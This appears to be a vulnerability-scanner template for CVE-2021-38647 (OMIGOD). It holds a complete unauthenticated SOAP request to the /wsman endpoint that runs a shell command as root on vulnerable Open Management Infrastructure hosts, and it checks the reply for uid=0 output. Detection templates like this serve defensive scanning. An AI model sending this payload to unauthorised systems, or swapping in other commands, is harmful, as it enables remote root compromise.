id: CVE-2021-38647

info:
  name: Open Management Infrastructure Remote Code Execution Vulnerability
  author: daffainfo
  severity: critical
  tags: cve,cve2021,rce,omi
  reference:
    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647

requests:

  - raw:
      - |
        POST /wsman HTTP/1.1
        Connection: Keep-Alive
        Content-Length: 1505
        Content-Type: application/soap+xml;charset=UTF-8
        Host: {{Hostname}}

        <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema">
           <s:Header>
              <a:To>HTTP://{{Hostname}}{{Path}}/</a:To>
              <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
              <a:ReplyTo>
                 <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
              </a:ReplyTo>
              <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action>
              <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
              <a:MessageID>uuid:0AB58087-C2C3-0005-0000-000000010000</a:MessageID>
              <w:OperationTimeout>PT1M30S</w:OperationTimeout>
              <w:Locale xml:lang="en-us" s:mustUnderstand="false" />
              <p:DataLocale xml:lang="en-us" s:mustUnderstand="false" />
              <w:OptionSet s:mustUnderstand="true" />
              <w:SelectorSet>
                 <w:Selector Name="__cimnamespace">root/scx</w:Selector>
              </w:SelectorSet>
           </s:Header>
           <s:Body>
              <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
                 <p:command>id</p:command>
                 <p:timeout>0</p:timeout>
              </p:ExecuteShellCommand_INPUT>
           </s:Body>
        </s:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<p:StdOut>uid=0(root) gid=0(root) groups=0(root)</p:StdOut>"
        part: body

      - type: status
        status:
          - 200